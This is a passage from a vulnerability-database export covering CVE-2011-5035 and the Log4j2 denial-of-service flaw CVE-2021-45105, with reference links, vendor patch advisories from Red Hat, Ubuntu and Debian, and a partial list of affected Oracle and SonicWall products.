"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/51194"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2012:0322"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/1373-2/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/2012/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=25553"
},
{
"trust": 0.1,
"url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 0.1,
"url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c02964430"
},
{
"trust": 0.1,
"url": "https://www.hp.com/go/swa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0504"
},
{
"trust": 0.1,
"url": "http://www.hp.com/go/java"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2204"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-2370"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0002"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3548"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2526"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2902"
},
{
"trust": 0.1,
"url": "http://www.hp.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-0534"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-3718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-6286"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5333"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3190"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5342"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5461"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2227"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-1232"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-5063"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-1947"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-5064"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4172"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2481"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-5062"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-0013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1157"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2901"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/knowledge/articles/11258"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0507.html"
},
{
"trust": 0.1,
"url": "http://www.ubuntu.com/usn/usn-1373-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openjdk-6b18/6b18-1.8.13-0ubuntu1~10.10.1"
},
{
"trust": 0.1,
"url": "http://www.ubuntu.com/usn/usn-1373-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openjdk-6b18/6b18-1.8.13-0ubuntu1~11.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openjdk-6b18/6b18-1.8.13-0ubuntu1~10.04.1"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2012-0135.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/company/jobs/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/47819/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47819"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/47819/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2012-0139.html"
},
{
"trust": 0.1,
"url": "http://www.oracle.com/technetwork/java/javase/6u31-relnotes-1482342.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2012-0322.html"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903934"
},
{
"db": "VULMON",
"id": "CVE-2011-5035"
},
{
"db": "BID",
"id": "51194"
},
{
"db": "PACKETSTORM",
"id": "111624"
},
{
"db": "PACKETSTORM",
"id": "125556"
},
{
"db": "PACKETSTORM",
"id": "112144"
},
{
"db": "PACKETSTORM",
"id": "110365"
},
{
"db": "PACKETSTORM",
"id": "109793"
},
{
"db": "PACKETSTORM",
"id": "109353"
},
{
"db": "PACKETSTORM",
"id": "109834"
},
{
"db": "PACKETSTORM",
"id": "110035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003567"
},
{
"db": "NVD",
"id": "CVE-2011-5035"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CERT/CC",
"id": "VU#903934",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2011-5035",
"ident": null
},
{
"db": "BID",
"id": "51194",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "111624",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "125556",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "112144",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "110365",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "109793",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "109353",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "109834",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "110035",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003567",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2011-5035",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2011-12-28T00:00:00",
"db": "CERT/CC",
"id": "VU#903934",
"ident": null
},
{
"date": "2011-12-30T00:00:00",
"db": "VULMON",
"id": "CVE-2011-5035",
"ident": null
},
{
"date": "2011-12-29T00:00:00",
"db": "BID",
"id": "51194",
"ident": null
},
{
"date": "2012-04-06T02:06:18",
"db": "PACKETSTORM",
"id": "111624",
"ident": null
},
{
"date": "2014-03-06T02:39:08",
"db": "PACKETSTORM",
"id": "125556",
"ident": null
},
{
"date": "2012-04-25T02:09:03",
"db": "PACKETSTORM",
"id": "112144",
"ident": null
},
{
"date": "2012-03-02T03:55:14",
"db": "PACKETSTORM",
"id": "110365",
"ident": null
},
{
"date": "2012-02-15T22:46:40",
"db": "PACKETSTORM",
"id": "109793",
"ident": null
},
{
"date": "2012-02-02T03:30:52",
"db": "PACKETSTORM",
"id": "109353",
"ident": null
},
{
"date": "2012-02-17T02:33:53",
"db": "PACKETSTORM",
"id": "109834",
"ident": null
},
{
"date": "2012-02-22T02:10:34",
"db": "PACKETSTORM",
"id": "110035",
"ident": null
},
{
"date": "2012-01-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003567",
"ident": null
},
{
"date": "2011-12-30T01:55:01.640000",
"db": "NVD",
"id": "CVE-2011-5035",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2016-02-15T00:00:00",
"db": "CERT/CC",
"id": "VU#903934",
"ident": null
},
{
"date": "2018-01-06T00:00:00",
"db": "VULMON",
"id": "CVE-2011-5035",
"ident": null
},
{
"date": "2015-04-13T21:24:00",
"db": "BID",
"id": "51194",
"ident": null
},
{
"date": "2015-03-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003567",
"ident": null
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-5035",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "network",
"sources": [
{
"db": "BID",
"id": "51194"
}
],
"trust": 0.3
},
"title": {
"_id": null,
"data": "Hash table implementations vulnerable to algorithmic complexity attacks",
"sources": [
{
"db": "CERT/CC",
"id": "VU#903934"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "51194"
}
],
"trust": 0.3
}
}
VAR-202112-1782
Vulnerability from variot - Updated: 2026-03-09 22:48Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apache Log4j. Authentication is not required to exploit this vulnerability.The specific flaw exists within the StrSubstitutor class. The issue results from the lack of proper validation of user-supplied data, which can result in a resource exhaustion condition. An attacker can leverage this vulnerability to create a denial-of-service condition on the process. Log4j is an open source project of Apache. By using Log4j, the destination of log information transmission can be controlled to be console, file, GUI component, even socket server, NT event recorder, etc. Apache Log4j2 has a denial of service vulnerability. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: Red Hat Data Grid 8.2.3 security update Advisory ID: RHSA-2022:0205-01 Product: Red Hat JBoss Data Grid Advisory URL: https://access.redhat.com/errata/RHSA-2022:0205 Issue date: 2022-01-20 CVE Names: CVE-2021-44832 CVE-2021-45046 CVE-2021-45105 =====================================================================
- Summary:
An update for Red Hat Data Grid is now available.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.
Data Grid 8.2.3 replaces Data Grid 8.2.2 and includes bug fixes and enhancements. Find out more about Data Grid 8.2.3 in the Release Notes [3].
Security Fix(es):
-
log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)
-
log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
-
log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
To install this update, do the following:
- Download the Data Grid 8.2.3 server patch from the customer portal[²].
- Back up your existing Data Grid installation. You should back up databases, configuration files, and so on.
- Install the Data Grid 8.2.3 server patch. Refer to the 8.2.3 Release Notes[³] for patching instructions.
-
Restart Data Grid to ensure the changes take effect.
-
Bugs fixed (https://bugzilla.redhat.com/):
2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) 2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern 2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender
- References:
https://access.redhat.com/security/cve/CVE-2021-44832 https://access.redhat.com/security/cve/CVE-2021-45046 https://access.redhat.com/security/cve/CVE-2021-45105 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches&product=data.grid&version=8.2 https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.2/html-single/red_hat_data_grid_8.2_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYemZbtzjgjWX9erEAQgkThAAhlH9r6fZ08ZbIvy7t5FNceA93qd12PsL bJEZ9axgCc1hrxm5hK2W6x55a2tKQ0ieoFlkF87qZ5FSsEmOWfvCa5Jsr04bGkhI QBiyZvX+de8ZAUcbiXwgsb3LwfY5DAOoLZVZj7tWsxXcl9CG/MGqI452b5jB4oWa 5TXa8YHSz9/vQHtJGmjyuZYJGfH63XvLUu6qHEgCHKhXEQg5p9YrfjbdZWk77mSk N+dqHpXJFo2G+UURxBy615ebIgxA1dUR6pdbCfm/fbUAxnxWPubjNLLGShCUNBP9 /WgSMiv5GT48yhpK0IdTpPmQUAQW3fkgEd58vytgDuQf/7NhsbNFlsj3hugnAmY9 B/Jtwri/dCaOy0EDlDTc22OX7uDXaoSd9t5kjFAiZMOhxRE0hXawGfCxdGq/rgV6 EblcKQ3zW/3lsTj5KdI+0M0kNA6y1i0KP+Iujs12WLzWDANcpyvpuNu5qIMoM16Y iy4QLJkWFcH99toKO6/bEFgINq3C84sDEQNUpgwga+ct5mxsZycn3vSl9QcuoWQD FX9lwXBaxGuvBb/K3pwXfJuRQOFn2tDpwqN0PnyG/4+QLHunSPuQ8vcVx+oG9a2K LpiYxMQawsJiOjEyNUdRt7DDBpU/mVO+pf7lCY/4F5S+xOJ6E6LkJ213aSGaYPBd QiLGYFSmmLk= =y5SE -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency.
The References section of this erratum contains a download link (you must log in to download the update). Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.4 Release Notes for information about the most significant bug fixes and enhancements included in this release. Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7 JBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1 JBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034 JBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17) JBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console JBEAP-22839 - GSS Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001 JBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001 JBEAP-22899 - Tracker bug for the EAP 7.4.4 release for RHEL-7 JBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002 JBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001 JBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001 JBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001 JBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002 JBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final JBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final JBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001 JBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final JBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001 JBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26 JBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001 JBEAP-23323 - GSS WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend JBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002 JBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001 JBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002
-
Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
-
Description:
Red Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
LOG-2073 - The elasticsearch-im-xxx job failed when trying to start index management process for a non-existent(empty-named) index [openshift-logging-5.2] LOG-2087 - resourceVersion is overflowing type Integer causing ES rejection
- ========================================================================= Ubuntu Security Notice USN-5222-1 January 11, 2022
apache-log4j2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.10
- Ubuntu 21.04
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in Apache Log4j 2. This issue only affected Ubuntu 18.04 LTS. (CVE-2021-45105)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.10: liblog4j2-java 2.17.1-0.21.10.1
Ubuntu 21.04: liblog4j2-java 2.17.1-0.21.04.1
Ubuntu 20.04 LTS: liblog4j2-java 2.17.1-0.20.04.1
Ubuntu 18.04 LTS: liblog4j2-java 2.12.4-0ubuntu0.1
In general, a standard system update will make all the necessary changes.
For the oldstable distribution (buster), this problem has been fixed in version 2.17.0-1~deb10u1.
For the stable distribution (bullseye), this problem has been fixed in version 2.17.0-1~deb11u1.
We recommend that you upgrade your apache-log4j2 packages.
For the detailed security status of apache-log4j2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/apache-log4j2
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmG+Ro1fFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeQVuBAArOperYABsLeaPcs3DgNxHcDDUNGCcvo5fsBtkh+MDvHMspqOb8VqLShx BtzPJGE0UTdBrfAqWeuMCbV1LdBYfwRUlrUyZiQXBiEx5BI5vDB4vaDUtAomwC6o vnbJwDlvlpoSwbURcls/Z0Hs15gwHX2D/lSa+j+NSxaNCkEOqvjr8dbpnHMSIbwz f0hSWQm4jydadUHP/zXSwN+LeZrJs+uP1tIdajtZjr6VoPkV48EDxCctaVttn27q 9DrGM9RjKGyCCKB/WrWToRbv/Mke20AJ4SOWoDdy1u/m2wcgW3pv1cap7J3RRjYO K5V5qacdJDo9FWoRkb1ftXlanyVe5DyI+j/9un+uZLSlOkeTha+hP+Tj2P/sx/Z4 xbpmPRGJ+O/BuxoPXUJNSTkh7vLu0CJkCfzi3Gj24c22jkBV3POJ7iZsFvNbJHAi 3i6VBc7e6tcqdiIhZqj/+odu2rCqeYqMbvhLL/slnQQVU4YMn3F1FtPWEpfAmQzP YCg2vLei5rTt3dYjA5aBluJPEPXO5rA5nZa3xq5hbzAJMl/m1yU9K6v73mCk9gnK yFHoaD+Ls97tPCMiO/56kIQecLv5s7GuuwLQlC8rm9TgXzl/m6rqst7a93IcsnV9 P+f2RZsciOyXo1N4zhakNkZ4dkmRZCfm9xCfeqAKUQgqVPXhBtE= =Wkr6 -----END PGP SIGNATURE-----
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "retail order broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3"
},
{
"_id": null,
"model": "e-business suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.2.0"
},
{
"_id": null,
"model": "flexcube universal banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.5"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.0"
},
{
"_id": null,
"model": "network security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "2.0"
},
{
"_id": null,
"model": "retail order broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "banking enterprise default management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.12.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.1"
},
{
"_id": null,
"model": "web application firewall",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "3.1.0"
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.12.3"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.4"
},
{
"_id": null,
"model": "email security",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "10.0.12"
},
{
"_id": null,
"model": "retail store inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.8"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.5.1.0"
},
{
"_id": null,
"model": "hyperion infrastructure technology",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.8.0"
},
{
"_id": null,
"model": "retail store inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3.7"
},
{
"_id": null,
"model": "agile engineering data management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.1.0"
},
{
"_id": null,
"model": "flexcube universal banking",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4"
},
{
"_id": null,
"model": "health sciences empirica signal",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.0.0"
},
{
"_id": null,
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail order management system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.5"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6.1.0"
},
{
"_id": null,
"model": "communications service broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2"
},
{
"_id": null,
"model": "banking treasury management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.5"
},
{
"_id": null,
"model": "sql developer",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "21.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "utilities framework",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3.0.6.0"
},
{
"_id": null,
"model": "management cloud engine",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.5.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.13"
},
{
"_id": null,
"model": "retail data extractor for merchandising",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.2"
},
{
"_id": null,
"model": "retail data extractor for merchandising",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.2"
},
{
"_id": null,
"model": "communications cloud native core console",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.9.0"
},
{
"_id": null,
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.13.0"
},
{
"_id": null,
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.3"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12.0.0"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.0.4"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.6.2"
},
{
"_id": null,
"model": "communications user data repository",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4"
},
{
"_id": null,
"model": "communications unified inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.5"
},
{
"_id": null,
"model": "financial services model management and governance",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.0.0"
},
{
"_id": null,
"model": "flexcube universal banking",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0.0"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.4"
},
{
"_id": null,
"model": "communications services gatekeeper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "6bk1602-0aa32-0tp0",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "2.7.0"
},
{
"_id": null,
"model": "health sciences empirica signal",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.1.0.6"
},
{
"_id": null,
"model": "payment interface",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.3"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"_id": null,
"model": "agile plm mcad connector",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.6"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"_id": null,
"model": "health sciences inform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0.0.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12.0"
},
{
"_id": null,
"model": "enterprise manager for peoplesoft",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.1.1"
},
{
"_id": null,
"model": "retail predictive application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
